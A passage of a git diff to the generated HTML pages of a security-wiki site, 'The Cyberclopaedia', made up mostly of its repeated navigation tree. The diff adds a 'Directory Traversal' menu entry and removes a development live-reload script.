        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -175,22 +175,6 @@

The Cyberclopaedia

- - diff --git a/docs/Networking/Protocols/Simple Network Management Protocol (SNMP).html b/docs/Networking/Protocols/Simple Network Management Protocol (SNMP).html index bceab35a..141d97fe 100644 --- a/docs/Networking/Protocols/Simple Network Management Protocol (SNMP).html +++ b/docs/Networking/Protocols/Simple Network Management Protocol (SNMP).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -201,22 +201,6 @@

Community - - diff --git a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Authentication & Association.html b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Authentication & Association.html index 35036852..8e24215c 100644 --- a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Authentication & Association.html +++ b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Authentication & Association.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -213,22 +213,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Control Frames.html b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Control Frames.html index 97b3d69a..2ede4c96 100644 --- a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Control Frames.html +++ b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Control Frames.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
